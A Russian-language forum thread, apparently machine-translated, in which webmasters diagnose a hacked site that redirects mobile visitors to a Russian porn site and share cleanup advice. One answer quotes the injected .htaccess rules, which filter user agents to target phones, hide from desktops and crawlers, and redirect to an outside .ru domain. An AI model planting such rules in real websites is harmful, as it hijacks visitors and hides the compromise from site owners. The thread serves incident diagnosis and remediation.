Сайт, который у меня есть перенаправляет на русский порно сайт на все мобильные браузеры (Opera, Android по умолчанию, Nokia по умолчанию) и т.д., но не тогда, когда доступ из не-мобильной платформы.
Есть идеи, в чем может быть проблема? Где искать?
5 ответов
1
Пожалуйста, найдите и изучите ваши файлы ./htaccess . В моем случае взлом выглядел следующим образом.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
----I deleted several more lines here
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
# Use PHP5.3 Single php.ini as default
AddHandler application/x-httpd-php54s .php
ЗАМЕЧАНИЕ ПРАВИЛА ПЕРЕЗАПИСИ, перенаправляющего на sswin.ru !!!
И я уверен, что это только начало беспорядка.
1
У Google Webmaster Central есть справочный сайт, который является хорошей отправной точкой, если ваш сайт был взломан или содержит вредоносное ПО.
1
Успешные злоумышленники часто внедряют некоторый JavaScript во все страницы, найденные на сервере, и этот код, возможно, проверяет ваш пользовательский агент. Таким образом, вы можете найти его, даже просто посмотрев на исходный код в вашем веб-браузере. Также может быть задействован некоторый код на стороне сервера, который обслуживает мобильные браузеры со специальным (дополнительным) кодом. Особенно, если у вас есть отдельные страницы для мобильных браузеров, это может вызвать другой эффект. Проверьте код, предоставленный мобильным браузерам, подделав пользовательский агент мобильного браузера в браузере вашего компьютера. В Firefox вы можете установить значение general.useragent.override в
Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B)
AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile
Safari/535.19
в about:config для подделки браузера Android. Отключите JavaScript в Firefox, чтобы предотвратить выполнение подозрительного скрипта. Если в исходном коде по-прежнему нет подозрительного кода JavaScript, вероятно, это происходит из-за некоторого кода или конфигурации запуска на стороне сервера. В этом случае проверьте наличие файлов .htaccess (если вы используете Apache) и таких исполняемых скриптов, как * .php. Если вы сами используете серверные сценарии, проверьте их целостность.
В любом случае вам нужно выяснить, как ваш сайт был взломан. Часто это делается путем использования известных уязвимостей в распространенных веб-приложениях (например, форумах, CMS, ...). Убедитесь, что вы исправили все известные уязвимости, установив достаточно свежую версию. Пароли, украденные из скомпрометированной настольной системы пользователя, также являются распространенной проблемой. Вы также должны убедиться, что вы надежно вернули свой сайт в известное исправное состояние. Там может быть больше изменений, чем те, вы уже знаете. Восстановление из чистой резервной копии - лучшее решение, если вы не можете подтвердить целостность всех ваших файлов на сервере.
1
Как сказал Гуркен, попытайтесь выяснить, есть ли какой-либо вредоносный JS, внедренный в страницу. Используете ли вы какие-либо объявления на сайте? Если это так, поставщик рекламы может показывать разный контент для мобильных устройств и компьютеров и иметь некоторый проблемный контент в мобильных объявлениях.
0
Я проверил файл .htaccess, но не нашел другого кода, кроме стандартного кода WordPress.
Другая худшая вещь, которую я вижу на своем веб-сайте, это то, что они создают n файлов PHP со случайными именами, добавляя однострочный код в индексные файлы. И я продолжаю удалять их каждые 2 дня. Например, мой сайт Zenharborspa.com
И перенаправление страниц на другие сайты при доступе через мобильные браузеры, тогда как веб-сайт отлично работает на рабочем столе. И да перенаправление на какой-нибудь SSWIN.RU.
Еще один способ найти основную причину.